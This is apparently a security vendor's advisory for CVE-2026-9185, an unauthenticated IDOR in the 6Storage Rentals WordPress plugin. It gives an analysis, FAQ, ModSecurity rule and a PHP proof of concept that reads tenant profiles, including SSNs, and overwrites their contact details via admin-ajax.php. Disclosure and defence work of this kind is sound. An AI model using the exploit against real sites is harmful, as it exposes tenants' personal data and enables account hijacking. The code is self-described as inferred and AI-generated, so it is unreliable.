How does this vulnerability work?

The vulnerability arises from the plugin’s AJAX handlers being registered without authentication checks, allowing attackers to submit requests with a ‘userId’ parameter. This enables them to access or alter tenant data without verifying the requester’s identity.

Who is affected by CVE-2026-9185?

Any WordPress site using the 6Storage Rentals plugin version 2.22.0 or earlier is affected. Administrators should check their plugin version and update if they are running a vulnerable version.

How can I check if my site is vulnerable?

Check the version of the 6Storage Rentals plugin installed on your WordPress site. If it is version 2.22.0 or earlier, your site is vulnerable to CVE-2026-9185.

What is the recommended fix for this vulnerability?

To remediate CVE-2026-9185, update the 6Storage Rentals plugin to the latest version that addresses this vulnerability. Additionally, ensure that AJAX handlers require authentication and implement proper capability checks.

What does the CVSS score of 7.5 indicate?

A CVSS score of 7.5 indicates a high severity vulnerability with significant potential impact on confidentiality. It suggests that exploitation could lead to unauthorized access to sensitive user data.

What are the risks associated with this vulnerability?

Successful exploitation can lead to unauthorized access to sensitive personal information, including Social Security Numbers. Attackers may also modify tenant profiles, leading to identity theft or data corruption.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an attacker can send crafted POST requests to the vulnerable AJAX endpoints. By manipulating the ‘userId’ parameter, the attacker can retrieve or modify tenant profile data without any authentication.

What are AJAX handlers and why are they important?

AJAX handlers in WordPress allow asynchronous requests to be processed without reloading the page. They are important for dynamic interactions but must be secured to prevent unauthorized access to sensitive data.

What is nonce validation and why is it necessary?

Nonce validation is a security feature in WordPress that helps protect against Cross-Site Request Forgery (CSRF) attacks. It ensures that requests are legitimate and made by authenticated users, which is critical in preventing unauthorized actions.

Can I prevent this vulnerability without updating the plugin?

While updating the plugin is the best solution, you can temporarily mitigate the risk by disabling the AJAX actions or restricting access to the admin-ajax.php file until a fix is applied.

What should I do if I have been affected by this vulnerability?

If your site has been exploited, immediately update the plugin and review your tenant data for unauthorized changes. Consider implementing additional security measures and monitoring for unusual activity.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 10, 2026

CVE-2026-9185: 6Storage Rentals <= 2.22.0 Unauthenticated Insecure Direct Object Reference to Arbitrary User Disclosure and Modification via 'userId' Parameter PoC, Patch Analysis & Rule

Q: What is CVE-2026-9185?

CVE-2026-9185 is a high-severity vulnerability in the 6Storage Rentals plugin for WordPress, affecting versions up to and including 2.22.0. It allows unauthenticated attackers to read and modify arbitrary tenant profile data through the ‘userId’ parameter in AJAX requests.

CVE ID CVE-2026-9185

Plugin 6storage-rentals

Severity High (CVSS 7.5)

CWE 639

Vulnerable Version 2.22.0

Patched Version —

Disclosed June 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-9185 (metadata-based): This vulnerability affects the 6Storage Rentals plugin for WordPress versions up to and including 2.22.0. It allows unauthenticated attackers to read and modify arbitrary tenant profile data via the ‘userId’ parameter. The CVSS score of 7.5 reflects a high confidentiality impact with no required privileges or user interaction.

Root Cause: The likely root cause is the registration of AJAX handlers on ‘wp_ajax_nopriv_’ hooks for both ‘six_storage_get_user_info’ and ‘six_storage_update_profile’ actions. These functions accept a tenant identifier via the ‘userId’ POST parameter. They fail to verify that the current user session corresponds to the supplied ‘userId’. No nonce validation, capability check, or ownership verification is performed. This allows direct access to functions that query and update tenant data using the user-controlled ID. This analysis is inferred from the CWE classification (639 Authorization Bypass Through User-Controlled Key) and the vulnerability description, as no source code diff is available for confirmation.

Exploitation: An unauthenticated attacker can craft POST requests to ‘/wp-admin/admin-ajax.php’ with the action parameter set to ‘six_storage_get_user_info’ or ‘six_storage_update_profile’. The attacker includes a ‘userId’ parameter with an enumerated numeric value. For ‘six_storage_get_user_info’, the response contains the tenant’s profile data including name, email, phone number, physical address, and SSN. For ‘six_storage_update_profile’, the attacker can modify these fields by supplying additional POST parameters for the fields to change. No authentication token or nonce is required. Attackers can enumerate valid ‘userId’ values by iterating through integers or obtaining them through other means.

Remediation: The plugin must validate that the authenticated user has ownership or administrative privileges over the supplied ‘userId’. For unauthenticated access, the AJAX handlers should be moved to ‘wp_ajax_’ hooks (requiring authentication) or implement proper capability checks using current_user_can(). The plugin should use WordPress nonces for CSRF protection and verify the nonce before processing requests. Each tenant’s data should only be accessible to the tenant themselves or an authorized administrator (e.g., via current_user_can(‘manage_options’)). Without code access, the exact fix cannot be confirmed, but these patterns directly address the CWE.

Impact: Successful exploitation allows an unauthenticated attacker to retrieve sensitive personal information of any tenant, including Social Security Numbers (SSNs). This is a severe data breach. The attacker can also modify tenant profiles, potentially changing email addresses to hijack accounts, altering contact information for identity theft, or corrupting critical rental management data. The ability to both read and write tenant data without authorization enables comprehensive privacy violations and business disruption.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-9185 (metadata-based)
# Blocks unauthenticated IDOR exploitation of 6Storage Rentals via AJAX handlers
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-9185 - 6Storage Rentals IDOR via AJAX',severity:'CRITICAL',tag:'CVE-2026-9185'"
  SecRule ARGS_POST:action "@rx ^six_storage_get_user_info$|^six_storage_update_profile$" 
    "chain"
    SecRule ARGS_POST:userId "@rx ^d+$" 
      "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-9185 - 6Storage Rentals <= 2.22.0 - Unauthenticated Insecure Direct Object Reference to Arbitrary User Disclosure and Modification via 'userId' Parameter

// This PoC demonstrates reading and modifying arbitrary tenant profile data
// Assumptions:
// 1. The plugin registers AJAX handlers named 'six_storage_get_user_info' and 'six_storage_update_profile'
// 2. These handlers accept a 'userId' parameter without authentication
// 3. The target WordPress site uses standard admin-ajax.php

// === CONFIGURATION ===
$target_url = 'http://example.com/wp-admin/admin-ajax.php'; // Change to target site
$user_id_to_enumerate = 1; // Start with a low integer ID to probe

// === STEP 1: Read tenant profile ===
echo "[+] Attempting to read tenant profile for userId: $user_id_to_enumeraten";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'action' => 'six_storage_get_user_info',
    'userId' => $user_id_to_enumerate
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code !== 200 || empty($response)) {
    die("[-] Failed to read tenant profile. HTTP code: $http_coden");
}

echo "[+] Response from read attempt:n$responsenn";

// === STEP 2: Modify tenant profile ===
// Assumption: The update handler expects fields like 'name', 'email', 'phone', 'address', 'ssn'
$updated_data = array(
    'action' => 'six_storage_update_profile',
    'userId' => $user_id_to_enumerate,
    'name' => 'Attacker Name',
    'email' => 'attacker@example.com',
    'phone' => '555-1234'
);

echo "[+] Attempting to modify tenant profile for userId: $user_id_to_enumeraten";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($updated_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code !== 200) {
    echo "[-] Update attempt failed. HTTP code: $http_coden";
} else {
    echo "[+] Update response:n$responsen";
}

// === STEP 3: Brute force enumeration (commented out for safety) ===
// For i in range(1, 100): repeat read with userId = i
// Uncomment below to iterate through IDs (use with caution)
/*
for ($i = 1; $i <= 100; $i++) {
    // Same logic as step 1, but with $i as userId
    // Add rate limiting if needed
}
*/

?>

Frequently Asked Questions

What is CVE-2026-9185?
Overview of the vulnerability
CVE-2026-9185 is a high-severity vulnerability in the 6Storage Rentals plugin for WordPress, affecting versions up to and including 2.22.0. It allows unauthenticated attackers to read and modify arbitrary tenant profile data through the ‘userId’ parameter in AJAX requests.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from the plugin’s AJAX handlers being registered without authentication checks, allowing attackers to submit requests with a ‘userId’ parameter. This enables them to access or alter tenant data without verifying the requester’s identity.
Who is affected by CVE-2026-9185?
Identifying vulnerable installations
Any WordPress site using the 6Storage Rentals plugin version 2.22.0 or earlier is affected. Administrators should check their plugin version and update if they are running a vulnerable version.
How can I check if my site is vulnerable?
Steps for verification
Check the version of the 6Storage Rentals plugin installed on your WordPress site. If it is version 2.22.0 or earlier, your site is vulnerable to CVE-2026-9185.
What is the recommended fix for this vulnerability?
Mitigation strategies
To remediate CVE-2026-9185, update the 6Storage Rentals plugin to the latest version that addresses this vulnerability. Additionally, ensure that AJAX handlers require authentication and implement proper capability checks.
What does the CVSS score of 7.5 indicate?
Understanding severity levels
A CVSS score of 7.5 indicates a high severity vulnerability with significant potential impact on confidentiality. It suggests that exploitation could lead to unauthorized access to sensitive user data.
What are the risks associated with this vulnerability?
Potential impacts of exploitation
Successful exploitation can lead to unauthorized access to sensitive personal information, including Social Security Numbers. Attackers may also modify tenant profiles, leading to identity theft or data corruption.
How does the proof of concept demonstrate the vulnerability?
Understanding the PoC
The proof of concept shows how an attacker can send crafted POST requests to the vulnerable AJAX endpoints. By manipulating the ‘userId’ parameter, the attacker can retrieve or modify tenant profile data without any authentication.
What are AJAX handlers and why are they important?
Role of AJAX in WordPress
AJAX handlers in WordPress allow asynchronous requests to be processed without reloading the page. They are important for dynamic interactions but must be secured to prevent unauthorized access to sensitive data.
What is nonce validation and why is it necessary?
Security mechanism in WordPress
Nonce validation is a security feature in WordPress that helps protect against Cross-Site Request Forgery (CSRF) attacks. It ensures that requests are legitimate and made by authenticated users, which is critical in preventing unauthorized actions.
Can I prevent this vulnerability without updating the plugin?
Temporary mitigation measures
While updating the plugin is the best solution, you can temporarily mitigate the risk by disabling the AJAX actions or restricting access to the admin-ajax.php file until a fix is applied.
What should I do if I have been affected by this vulnerability?
Steps for affected users
If your site has been exploited, immediately update the plugin and review your tenant data for unauthorized changes. Consider implementing additional security measures and monitoring for unusual activity.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations